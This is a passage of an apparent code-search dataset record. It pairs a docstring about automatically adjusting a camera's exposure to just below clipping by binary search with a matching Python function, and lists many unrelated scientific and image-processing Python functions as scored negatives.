pos\n thisobs.positionstr = 'user-specified, zero-indexed pixel coordinates.'\n if isinstance(fn, str):\n header = pyfits.getheader(fn)\n if not timekey==None:\n if timekey in header: \n thisobs.time=header['timekey']\n thisobs.timestr='heliocentric modified julian date'\n if 'object' in header: thisobs.object = header['object']\n if 'exptime' in header: thisobs.exptime = header['exptime']\n thisobs.aper = dap\n thisobs.aperstr = 'target, inner, outer aperture diameters, in pixels.'\n thisobs.filename=fn\n thisobs.resamp = resamp\n if retfull:\n thisobs.mask_targ = mask_targ\n thisobs.mask_sky = mask_sky\n thisobs.frame = frame\n\n if verbose:\n from pylab import figure, colorbar\n from nsdata import imshow\n figure(); imshow(frame*mask_targ); colorbar()\n figure(); imshow(frame*mask_sky); colorbar()\n\n return thisobs", "def calc_tsunami(slip_result):\n gf = h5py.File('NA_CAS.hdf5', 'r')\n time_array = np.array(gf['time/timedata'])\n\n # dictionary for holding slip calculations\n scale_gf = []\n\n # declare empty array with max size\n ar_len = len(time_array)\n ar_width = get_array_size()\n\n tgf = np.zeros(shape=(ar_len, ar_width)) # tgf = tsunami green's function\n\n # loop over index adn slip value from slip array\n for i, slip in enumerate(slip_result):\n # print(i)\n # make sure slip is a float not string\n s = float(slip)\n\n # multiply slip by each subfault\n scale_gf.append(s * gf['GF/{:03}'.format(i)][:])\n\n # iterate over all the subfaults and add all subfaults together per site\n for sf in scale_gf:\n tgf += sf\n\n # return the 
slip_at_site array and the time array\n return (tgf, time_array)", "def combined_gaussian(amps, fwhms, means, x):\n if len(amps) > 0.:\n for i in range(len(amps)):\n gauss = gaussian(amps[i], fwhms[i], means[i], x)\n if i == 0:\n combined_gauss = gauss\n else:\n combined_gauss += gauss\n else:\n combined_gauss = np.zeros(len(x))\n return combined_gauss", "def sim_hits(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n trajs = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n traj = list()\n traj.append(curr)\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n traj.append(curr)\n \n if len(traj)>=cutoff:\n # traj=[nan]\n break\n \n trajs.append(array(traj))\n\n return trajs", "def amp_by_time(sig, fs, f_range, hilbert_increase_n=False, remove_edges=True, **filter_kwargs):\n\n sig_filt, kernel = filter_signal(sig, fs, infer_passtype(f_range), f_range=f_range,\n remove_edges=False, return_filter=True, **filter_kwargs)\n\n amp = np.abs(robust_hilbert(sig_filt, increase_n=hilbert_increase_n))\n\n if remove_edges:\n amp = remove_filter_edges(amp, len(kernel))\n\n return amp", "def extract_distribution(ptree):\n w_apx = np.zeros(ptree.shape)\n FlattenPtreeRecur(ptree, w_apx, 1, 1)\n return w_apx", "def processImage(imgs):\r\n imgs = imgs.astype(np.float32)\r\n for i, img in enumerate(imgs):\r\n m = img.mean()\r\n s = img.std()\r\n imgs[i] = (img - m) / s\r\n return imgs", "def learnGauss(metricArray): \n fit = gaussReg() \n n= 100 #You should probably change this...\n overlap = 0.3 \n imageSize = [100,400]\n densMap(fit, metricArray, n, overlap, imageSize )\n overlayMap('SmallTile.jpg', 'ContourPlot.jpg') \n # Final map is saved as OverlayMap.jpg", "def calculate_meanpT_fluc(dN_array, pT_array, pT_min=0.0, pT_max=3.0):\n npT_interp = 50\n pT_inte_array = linspace(pT_min, pT_max, npT_interp)\n\n nev, npT = dN_array.shape\n mean_pT_array = zeros(nev)\n for iev in range(nev):\n dN_interp = exp(interp(pT_inte_array, pT_array[iev, :],\n log(dN_array[iev, :] + 1e-30)))\n mean_pT_array[iev] = (sum(pT_inte_array**2.*dN_interp)\n /sum(pT_inte_array*dN_interp))\n\n # compute the error using jack-knife\n rn_array = zeros(nev)\n for iev in range(nev):\n array_idx = [True]*nev\n array_idx[iev] = False\n array_idx = array(array_idx)\n rn_ev = (std(mean_pT_array[array_idx])\n /(mean(mean_pT_array[array_idx]) + 1e-15))\n rn_array[iev] = rn_ev\n rn_mean = mean(rn_array, axis=0)\n rn_err = sqrt((nev - 1.)/nev*sum((rn_array - rn_mean)**2.))\n return([rn_mean, rn_err])", "def _find_peaks_heuristic(phnorm):\n median_scale = np.median(phnorm)\n\n # First make histogram with bins = 0.2% of median PH\n hist, bins = np.histogram(phnorm, 1000, [0, 2*median_scale])\n binctr = bins[1:] - 0.5 * (bins[1] - bins[0])\n\n # Scipy continuous wavelet transform\n pk1 = np.array(sp.signal.find_peaks_cwt(hist, np.array([2, 4, 8, 12])))\n\n # A peak must contain 0.5% of the data or 500 events, whichever is more,\n # but the requirement is not more than 5% of data (for meager data sets)\n Ntotal = len(phnorm)\n MinCountsInPeak = min(max(500, Ntotal//200), Ntotal//20)\n pk2 = pk1[hist[pk1] > MinCountsInPeak]\n\n # Now take peaks from highest to lowest, provided they are at least 40 bins from any neighbor\n ordering = hist[pk2].argsort()\n pk2 = pk2[ordering]\n peaks = [pk2[0]]\n\n for pk in pk2[1:]:\n if (np.abs(peaks-pk) > 10).all():\n peaks.append(pk)\n 
peaks.sort()\n return np.array(binctr[peaks])", "def get_mean_image_population(caps_directory, tsv, template_image):\n import pandas as pd\n import os\n import nibabel as nib\n import numpy as np\n\n if not os.path.exists(os.path.join(caps_directory, 'group')):\n os.makedirs(os.path.join(caps_directory, 'group'))\n\n df = pd.read_csv(tsv, sep='\\t')\n if ('session_id' != list(df.columns.values)[1]) and (\n 'participant_id' != list(df.columns.values)[0]):\n raise Exception('the data file is not in the correct format.')\n participant_id = list(df['participant_id'])\n session_id = list(df['session_id'])\n\n # get the template image info:\n template_image_data = nib.load(template_image)\n template_image_array = template_image_data.get_data()\n header = template_image_data.header\n affine = template_image_data.affine\n\n final_array = np.empty((template_image_array.shape[0], template_image_array.shape[1], template_image_array.shape[2], len(participant_id)))\n\n for i in range(len(participant_id)):\n image = os.path.join(caps_directory, 'subjects', participant_id[i], session_id[i], 't1', 'preprocessing_dl', participant_id[i] + '_' + session_id[i] + '_space-MNI_res-1x1x1.nii.gz')\n image_data = nib.load(image)\n image_array = image_data.get_data()\n final_array[..., i] = image_array\n\n # take the mean of image\n final_mean_array = np.mean(final_array, axis=3)\n\n # save the mean image as nifti\n mean_image = nib.Nifti1Image(final_mean_array, affine, header)\n nib.save(mean_image, os.path.join(caps_directory, 'group', 'mean_population.nii.gz'))", "def make_photon_arrays(path, numevents):\n xcoords = []\n zcoords = []\n \n nsipmarrays = []\n nabsarrays = []\n \n for filename in os.listdir(path):\n\n photondata = np.loadtxt(path+'/'+filename,delimiter=',',usecols=[1,4])\n\n coords = filename[0:8]\n\n arraylen = len(photondata.flatten('F'))\n \n nsipmphotons = photondata.flatten('F')[numevents:arraylen]\n #print(len(nsipmphotons))\n nabsphotons = photondata.flatten('F')[0:numevents] \n \n nsipmarrays.append(nsipmphotons)\n nabsarrays.append(nabsphotons)\n \n x = re.findall('(-[0-9]+)x',coords) \n \n if bool(x) == False:\n x = re.findall('([0-9]+)x', coords)\n \n z = re.findall('(-[0-9]+)z',coords) \n\n if bool(z) == False:\n z = re.findall('([0-9]+)z',coords)\n\n xcoords.append(x[0])\n zcoords.append(z[0])\n \n xcoords = np.array(xcoords).astype(np.float)\n zcoords = np.array(zcoords).astype(np.float)\n \n return xcoords, zcoords, nsipmarrays, nabsarrays", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n img = cropPic(img, levels)\r\n pyrLst = [img]\r\n gaussian = gaussianKer(5)\r\n\r\n for i in range(1, levels):\r\n I_temp = cv2.filter2D(pyrLst[i - 1], -1, gaussian, cv2.BORDER_REPLICATE)\r\n I_temp = I_temp[::2, ::2]\r\n pyrLst.append(I_temp)\r\n return pyrLst", "def locate_traps(graph):\n traps = []\n for node in graph:\n if len(graph[node]) < 2:\n traps.append(node)\n continue\n else:\n neighbours = graph[node]\n\n # copy graph and delete the node\n temp_graph = copy.deepcopy(graph)\n for neighbour in neighbours:\n temp_graph[neighbour].remove(node)\n temp_graph.pop(node)\n\n # heuristic: if you can BFS from a node's neighbour to all other neighbours in < 10 steps (after removing that node), then graph is still connected => not a trappable node\n BFS_q = deque()\n visited = [[False] * 12 for _ in range(10)]\n visited[neighbours[0][1]][neighbours[0][0]] = True\n BFS_q.append(neighbours[0])\n counter = 0\n while len(BFS_q) > 0 and counter < 10:\n u = BFS_q.popleft()\n for 
BFS_neighbour in temp_graph[u]:\n if not visited[BFS_neighbour[1]][BFS_neighbour[0]]:\n visited[BFS_neighbour[1]][BFS_neighbour[0]] = True\n BFS_q.append(BFS_neighbour)\n counter += 1\n for neighbour in neighbours:\n if visited[neighbour[1]][neighbour[0]] is False:\n traps.append(node)\n continue\n return (traps)", "def Read_AGSS(fln, oversample=None, sigma=None, tophat=None, thin=None, wave_cut=None, convert=None, linlog=False):\n ## Opening the file table\n hdu = pyfits.open(fln)\n\n ## Extracting the wavelength from the header\n hdr = hdu[0].header\n wav = hdr['CRVAL1'] + np.arange(hdr['NAXIS1'], dtype=float) * hdr['CDELT1']\n\n ## Extracting the data. grid.shape = n_mu, n_wavelength\n grid = hdu[0].data\n\n ## Trim the unwanted wavelength range\n if wave_cut is not None:\n inds = (wav >= wave_cut[0]) * (wav <= wave_cut[1])\n grid = grid[:,inds]\n wav = wav[inds]\n\n ## Oversample the spectrum if requested\n if oversample is not None and oversample != 1:\n #grid = scipy.ndimage.zoom(grid, oversample, order=1, mode='reflect')\n #wav = np.linspace(wav[0], wav[-1], wav.size*oversample)\n interp = scipy.interpolate.UnivariateSpline(wav, grid, k=1, s=0)\n wav = np.linspace(wav[0], wav[-1], wav.size*oversample+1)\n grid = interp(wav)\n\n ## Smooth the spectrum if requested\n logger.log(6, \"Original: sigma {}, tophat {}\".format(sigma,tophat))\n if sigma is not None or tophat is not None:\n bin = wav[1]-wav[0]\n ## We have to convert values to bin units\n if sigma is None:\n sigma = 0.\n else:\n sigma = sigma/bin\n if tophat is None:\n tophat = 1\n else:\n tophat = int(tophat/bin + 0.5)\n tophat = 1 if tophat < 1 else tophat\n logger.log(6, \"Bin converted: bin {}, sigma {}, tophat {}\".format(bin,sigma,tophat))\n grid = Utils.Series.Convolve_gaussian_tophat(grid, sigma=sigma, top=tophat)\n\n ## Thin the spectrum if requested\n if thin is not None:\n grid = grid[::thin]\n wav = wav[::thin]\n\n ## Convert to logarithmic (velocity) scale so that Doppler boosting is linear\n if linlog:\n new_wav, z = Utils.Series.Resample_linlog(wav)\n ws, inds = Utils.Series.Getaxispos_vector(wav, new_wav)\n wav = new_wav\n grid = grid.take(inds, axis=-1)*(1-ws) + grid.take(inds+1, axis=-1)*ws\n else:\n z = None\n if convert is not None:\n print( \"Saving the data into \"+fln+convert )\n np.savetxt(fln+convert,np.vstack((wav,np.log10(grid))).T)\n return grid, wav, z", "def adaptiveGaussianThreshold(img):\n\tgray = grayscale(img)\n\tgray = cv2.medianBlur(gray, 5)\n\tthresh = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\treturn thresh", "def calc_flux_array(self):\n \n # First determine the associated spectrum\n self.compute_template_spectrum()\n\n # Calculate baseline counts to normalise fluxes we scan over\n # Go from 10**(bin_min)*mean up to 10**(bin_max)*mean in nbins steps\n b = self.setup_b_instance(0,add_ps_mask=True)\n mean = np.sum(b.CTB_masked_compressed[0])/len(b.CTB_masked_compressed[0])\n A_array = mean*10**np.linspace(self.bin_min,self.bin_max,self.nbins)\n\n # Array to get LLs when no profile likelihood run\n norun = np.array([1.0, 1.0, 1.0, 1.0])\n\n # Now setup and compute the arrays\n LL_array = np.array([]) \n A_array_short = np.array([])\n spect_array = np.array([])\n\n for i in range(len(A_array)):\n print \"on i =\",i\n # Calculate LL\n if i == 0:\n b1 = self.setup_b_instance(A_array[i],add_ps_mask=True)\n else:\n for key in b1.fixed_template_dict_nested.keys():\n b1.fixed_template_dict_nested[key] = 
b1.fixed_template_dict_nested[key]*A_array[i]/A_array[i-1]\n ll_val = b1.ll(norun,4,4)\n # Make triangle\n\n # Append to arrays\n LL_array = np.append(LL_array,ll_val)\n A_array_short = np.append(A_array_short,A_array[i])\n spect_array = self.spectrum*np.array(A_array_short)\n\n # Save output\n np.save(work_dir+'ScanOutput/'+self.tag+'/En_array-'+str(self.flux_array_ebin)+'.npy',self.En_center)\n np.save(work_dir+'ScanOutput/'+self.tag+'/LL_array-'+str(self.flux_array_ebin)+'.npy',LL_array)\n np.save(work_dir+'ScanOutput/'+self.tag+'/Flux_array-'+str(self.flux_array_ebin)+'.npy',spect_array)", "def extract_features(img, thr=0.005):\n if img.ndims == 3:\n img = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.AKAZE_create()\n (kpts, descs) = detector.detectAndCompute(img, None)\n return kpts, descs", "def fmgf(array, sigma):\n x, y = np.arange(len(array)), array.copy()\n yg = ndimage.filters.gaussian_filter(y, sigma)\n y -= yg\n\n # digitizing\n m = 101\n dy = 6.0 * mad(y) / m\n ybin = np.arange(np.min(y) - 5 * dy, np.max(y) + 5 * dy + dy, dy)\n z = np.zeros([len(ybin), len(x)])\n z[np.digitize(y, ybin), x] = 1.0\n\n # filtering\n g = partial(ndimage.filters.gaussian_filter, sigma=(0, sigma))\n c = partial(ndimage.filters.convolve1d, weights=np.ones(m), axis=0)\n zf = c(c(c(g(z))))\n\n # estimates\n ym1, y0, yp1 = [ybin[np.argmax(zf, 0) + i] for i in (-1, 0, 1)]\n zm1, z0, zp1 = [zf[np.argmax(zf, 0) + i, x] for i in (-1, 0, 1)]\n t = (zm1 - z0) / (zm1 - 2 * z0 + zp1)\n\n filtered = yg + ((1 - t) ** 2) * ym1 + (2 * t * (1 - t)) * y0 + (t**2) * yp1\n return filtered", "def _compute_supersky(self, starMasks):\n # TODO: break this into more managably bite sized bits if necessary.\n\n # Construct a median normalized data stack\n dataStack = np.zeros(self.shape, dtype=np.float32)\n\n # Loop through each image, normalize and place in data stack\n for imgNum, img in enumerate(self.imageList):\n # Copy the data for this image\n thisData = img.data\n\n # Mask this image with its starMask\n starInds = np.where(starMasks[imgNum, :, :])\n thisData[starInds] = np.NaN\n\n # Compute the median of this image\n thisMedian = np.nanmedian(thisData)\n\n # Median normalize this image\n thisData /= thisMedian\n\n # Place the normalized image in its place\n dataStack[imgNum, :, :] = thisData\n\n # Compute the median image (ignore warnings because we'll fix those)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n medianArray = np.nanmedian(dataStack, axis=0)\n\n # Comptue uncertainty as standard deviation/sqrt(numOfUnmaskedPixels)\n stdArray = np.nanstd(dataStack, axis=0)\n numPix = np.nansum(dataStack, axis=0)\n uncertArray = stdArray/np.sqrt(numPix - 1)\n\n # Renormalize by this output median\n thisMedian = np.nanmedian(medianArray)\n medianArray /= thisMedian\n uncertArray /= np.abs(thisMedian)\n\n # Return to user\n return medianArray, uncertArray", "def find_gaussian(img,sigma=25):\n method = 'cv2.TM_CCOEFF_NORMED'\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n threshold = 0.9\n w, h = template.shape[::-1]\n \n img2 = img.copy()\n meth = eval(method)\n\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n #Filters location map so that only one gaussian is found per contiguous location\n location_map = res >= threshold*np.max(res)\n location_map,nr = ndi.label(location_map)\n list_x = []\n list_y = []\n for label in range(1,nr+1):\n tmp=location_map==label\n if 
np.count_nonzero(tmp)>1:\n points = np.where(tmp)\n l = len(points[0])\n cx = (np.sum(points[0]) + l/2)/l\n cy = (np.sum(points[1]) + l/2 )/l\n list_x.append(cx)\n list_y.append(cy)\n loc= (np.asarray(list_x),np.asarray(list_y))\n stack_to_remove = np.zeros((size,size,len(loc[0])))\n i=0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(img2, pt, (pt[0] + w, pt[1] + h), 255, 2)\n stack_to_remove[:,:,i] = img[pt[1]:pt[1]+w,pt[0]:pt[0]+h]\n i+=1\n return stack_to_remove,loc", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def extract_statistics(transformed: np.ndarray) -> np.ndarray:\n ecg_features = []\n print(\"Extracting statistics from transformed signals...\")\n\n for x in tqdm(transformed):\n median_temp = np.median(x[:, :-1], axis=0)\n mad_temp = median_abs_deviation(x[:, :-1], axis=0)\n\n median_hr = np.median(x[:, -1], keepdims=True)\n mad_hr = median_abs_deviation(x[:, -1]).reshape([-1])\n\n features = np.concatenate([median_temp, mad_temp, median_hr, mad_hr])\n ecg_features.append(features)\n\n return np.array(ecg_features)", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gauss_pyramid = [img]\r\n gArr = cv2.getGaussianKernel(5, -1)\r\n gKernel = gArr @ gArr.transpose()\r\n for i in range(1, levels):\r\n It = cv2.filter2D(gauss_pyramid[i-1], -1, gKernel)\r\n It = It[::2, ::2]\r\n gauss_pyramid.append(It)\r\n\r\n return gauss_pyramid", "def extract_anisotropy_features (Parameters, image, mask=None):\n \n data_inputs = {}\n \n Ka, Kb, Kc = Parameters.kA, Parameters.kB, Parameters.kC\n \n \n h, w, channels = image.shape\n \n if channels == 2:\n channel_types = [\"Para\", \"Perp\"]\n elif channels == 3:\n 
channel_types = [\"Open\", \"Para\", \"Perp\"]\n \n \n for index, channel in enumerate(channel_types):\n \n data_inputs[channel] = np.sum(image[:,:, index])/np.count_nonzero(image[:,:, index])\n\n\n #Additional parameters\n para_value = data_inputs['Para']\n perp_value = data_inputs['Perp']\n data_inputs['AniAvg'] = (para_value - perp_value)/(para_value + 2*perp_value)\n \n #With corrections\n data_inputs['Ix'] = Ix = ((Ka+Kb)*perp_value - (Ka+Kc)*para_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['Iy'] = Iy = (Kb*para_value - Kc*perp_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['AniAvg'] = (Ix - Iy)/(Ix + 2*Iy)\n \n\n \n return (data_inputs)", "def search_peaks(self, image):\n table = Table()\n if not isinstance(image, np.ndarray):\n return table\n\n search_image = image\n if self.smooth:\n with catch_warnings():\n simplefilter('ignore')\n search_image = convolve_fft(\n search_image, Gaussian2DKernel(self.sigma),\n normalize_kernel=True,\n preserve_nan=True)\n\n # always replace NaNs with median level: DAOStarFinder\n # won't find sources with NaN on top\n nval = np.isnan(search_image)\n search_image[nval] = np.median(search_image[~nval])\n\n # always take absolute value for fitting purposes\n search_image = abs(search_image)\n\n threshold = np.array([np.nanmin(search_image),\n np.nanmax(search_image)])\n threshold *= [0.9, 1.1]\n if threshold[0] < 0: # pragma: no cover\n threshold[0] = 0.\n\n self.iteration = 0\n while self.iteration < self.maxiter:\n self.iteration += 1\n with catch_warnings():\n simplefilter('ignore', AstropyWarning)\n self.threshold = threshold.mean()\n finder = DAOStarFinder(\n self.threshold, self.fwhm,\n sharplo=self.sharplo, sharphi=self.sharphi,\n roundlo=self.roundlo, roundhi=self.roundhi)\n table = finder.find_stars(search_image)\n self.chopnod_sort(table)\n\n if self.refine and self.positive:\n self.refine_table(image, table)\n if not table:\n nfound = 0\n else:\n nfound = len(table)\n\n if abs(threshold[0] - threshold[1]) < self.eps and (\n nfound != self.npeaks):\n self.print('Min/max interval is null, breaking loop at '\n 'iteration #%s' % self.iteration)\n return table\n elif nfound < self.npeaks:\n threshold[1] = self.threshold\n elif nfound > self.npeaks:\n threshold[0] = self.threshold\n else:\n return table\n else:\n return table", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def _screen_by_snr(self,\n array: np.ndarray,\n is_smoothed: bool,\n keep_negative: bool) -> np.ndarray:\n n_gates, _, saturation_noise, noise_min = self.noise_params\n noise_min = noise_min[0] if is_smoothed is True else noise_min[1]\n noise = _estimate_noise_from_top_gates(array, n_gates, noise_min)\n array = self._reset_low_values_above_saturation(array, saturation_noise)\n array = self._remove_noise(array, noise, keep_negative)\n return array", "def create_gaussian_array(self):\n\n # Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, 
self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array" ]
[ "0.587632", "0.52485836", "0.5228704", "0.5138485", "0.5076651", "0.50504184", "0.5020896", "0.49921283", "0.49873865", "0.4987357", "0.49527085", "0.48427442", "0.48109403", "0.4805407", "0.47939897", "0.47633266", "0.47571003", "0.47376722", "0.47331765", "0.47273827", "0.470503", "0.46984622", "0.46977895", "0.46950454", "0.46633723", "0.4635799", "0.46310976", "0.4594745", "0.4588485", "0.45748767", "0.45734733", "0.4560085", "0.4550026", "0.45269135", "0.45187512", "0.4513564", "0.4503864", "0.45015773", "0.4487218", "0.44871503", "0.44714704", "0.4454072", "0.44430974", "0.44375116", "0.4419168", "0.44191366", "0.44144252", "0.44118664", "0.44089362", "0.44034746", "0.43921626", "0.43899295", "0.43772966", "0.43628797", "0.4351655", "0.43502825", "0.43458703", "0.43381307", "0.4332353", "0.43220693", "0.4319666", "0.4318764", "0.43162322", "0.43155703", "0.43148923", "0.4314468", "0.43024802", "0.43016464", "0.4301208", "0.42991918", "0.42934328", "0.42918316", "0.42837703", "0.42795086", "0.4278043", "0.42770097", "0.42757356", "0.4271442", "0.42655483", "0.42619538", "0.4261159", "0.4258165", "0.4254408", "0.42481622", "0.42460847", "0.42455357", "0.42452404", "0.42407414", "0.424074", "0.42403284", "0.4237082", "0.42351753", "0.42349866", "0.42326018", "0.42323828", "0.42321843", "0.42305118", "0.422921", "0.4213736", "0.42114887" ]
0.5898754
0
Given the opened camera object and the Slider object connected to the camera's exposure, adjusts the exposure to just below clipping, using a binary search.
def fix_exposure(cam, slider, verbose=False):
    margin = 10
    exp_t = MAX_EXP / 2
    cam._set_exposure(exp_t * u.milliseconds)
    time.sleep(0.5)
    print("Fetching Frame")
    im = cam.latest_frame()
    x_len = len(im)

    right, left = MAX_EXP, 0
    inc = right / 10
    for _ in range(10):
        ## Determine if Clipping or Low-Exposure ##
        gap = 255
        for i in range(x_len):
            if i < margin or x_len - i < margin:
                continue
            else:
                gap = min(255 - max(im[i]), gap)

        ## Make Appropriate Adjustment ##
        if gap == 0:
            if verbose:
                print("Clipping at: ", exp_t)
            right = exp_t
        elif gap > 50:
            if verbose:
                print("Closing gap: ", gap, " w/ exposure: ", exp_t)
            left = exp_t
        else:
            if verbose:
                print("Final Exposure: ", exp_t)
            return

        if inc < 0.01:
            exp_t -= inc if gap == 0 else -inc
        else:
            exp_t = (right + left) / 2
            inc = (right - left) / 10

        slider.set_val(exp_t)
        time.sleep(1)
        im = cam.latest_frame()
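A minimal usage sketch of the document above, for context only. It assumes MAX_EXP, the opened camera object, and the unit registry u come from the surrounding acquisition script, and that the Slider is matplotlib's widget (the function calls set_val on it); all names below are illustrative, not part of the dataset record.

# Sketch: build an exposure slider and hand it to fix_exposure along with a camera.
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider

MAX_EXP = 150  # assumed maximum exposure time, in milliseconds

fig, ax = plt.subplots()
plt.subplots_adjust(bottom=0.25)
slider_ax = plt.axes([0.15, 0.1, 0.7, 0.05])
exposure_slider = Slider(slider_ax, "Exposure (ms)", 0.01, MAX_EXP, valinit=MAX_EXP / 2)

# With an opened camera object (hypothetical here), the binary search would be started as:
# fix_exposure(cam, exposure_slider, verbose=True)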
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_exposure(self, expo):\n if expo == 0:\n self.exposure = 0\n elif expo == 1:\n self.exposure = min(9, self.exposure+1)\n elif expo == -1:\n self.exposure = max(-9, self.exposure-1)\n self.drone.set_exposure(self.exposure)\n log.info(f\"EXPOSURE {self.exposure}\")", "def exposure(self):\n\n # define a range of declination to evaluate the\n # exposure at\n self.declination = np.linspace(-np.pi/2, np.pi/2, self.num_points)\n\n m = np.asarray([m_dec(d, self.params) for d in self.declination])\n \n # normalise to a maximum at 1\n self.exposure_factor = (m / m_dec(-np.pi/2, self.params))\n\n # find the point at which the exposure factor is 0\n self.limiting_dec = Angle((self.declination[m == 0])[0], 'rad')", "def roi_ko(self):\n self.pressure_img.mask = self.pressure_img.previous_roi", "def process_image(self, image):\n #Resize and blur the image, put into HSV color scale, and create an image mask \n img_small = cv2.resize(image, None, fx=self.subsample_ratio, fy=self.subsample_ratio, interpolation=cv2.INTER_LINEAR) \n img_blur = cv2.GaussianBlur(img_small, (5,5), 0)\n img_hsv = cv2.cvtColor(img_blur, cv2.COLOR_BGR2HSV)\n mask_l = cv2.inRange(img_hsv, self.hsv_lower_lower, self.hsv_lower_upper)\n mask_u = cv2.inRange(img_hsv, self.hsv_upper_lower, self.hsv_upper_upper)\n mask = cv2.bitwise_or(mask_l, mask_u)\n\n #Publish the mask\n mask_bgr8 = cv2.cvtColor(mask,cv2.COLOR_GRAY2BGR)\n bridge = CvBridge()\n cv_mask = bridge.cv2_to_imgmsg(mask_bgr8, encoding='bgr8')\n self.pub.publish(cv_mask)\n\n #find the largest contour of the mask or return 0 if target is not there\n img, cnts, cnt_hier = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n if len(cnts) == 0:\n return (0, (0,0))\n c = max(cnts, key=cv2.contourArea)\n\n #find the height of the target object and its center using minAreaRect\n rect = cv2.minAreaRect(c)\n height_px = rect[1][1] / self.subsample_ratio\n target_x = rect[0][0] / self.subsample_ratio\n target_y = rect[0][1] / self.subsample_ratio\n offset_px = (target_x - self.image_center[0]) , -1.0*(target_y - self.image_center[1])\n\n #NOTE!! 
When using a ball shaped object, use minEnclosingCircle and the circle diameter\n #enc_circle = 2 * cv2.minEnclosingCircle(c)[1]\n #height_px = 2 * enc_circle[1]\n #offset_px = (enc_circle[0][0] - self.image_center[0]) , -1*(enc_circle[0][1] - self.image_center[1])\n\n return height_px, offset_px", "def enable_lower_center_roi_auto_exposure(image_width, image_height, hid_handle, win_size=4):\n outputLow = 0\n outputHigh = 255\n\n # Convert RoI center position to 0-255 value\n inputXLow = 0\n inputXHigh = image_width - 1\n inputXCord = int(image_width / 2)\n outputXCord = int(((inputXCord - inputXLow) / (inputXHigh - inputXLow)) * (outputHigh - outputLow) + outputLow)\n\n inputYLow = 0\n inputYHigh = image_height - 1\n inputYCord = int(image_height * 3 / 4)\n outputYCord = int(((inputYCord - inputYLow) / (inputYHigh - inputYLow)) * (outputHigh - outputLow) + outputLow)\n\n input_buffer = bytearray([0] * BUFFER_LENGTH)\n input_buffer[1] = CAMERA_CONTROL_CU20\n input_buffer[2] = SET_AE_ROI_MODE_CU20\n input_buffer[3] = AutoExpManual\n input_buffer[4] = outputXCord\n input_buffer[5] = outputYCord\n input_buffer[6] = win_size\n\n hid_write(hid_handle, input_buffer)\n output_buffer = hid_read(hid_handle)\n\n if output_buffer[6] == 0x00:\n print(\"\\nEnabling AutoExposure(RoI based) is failed\\n\")\n return False\n elif (\n output_buffer[0] == 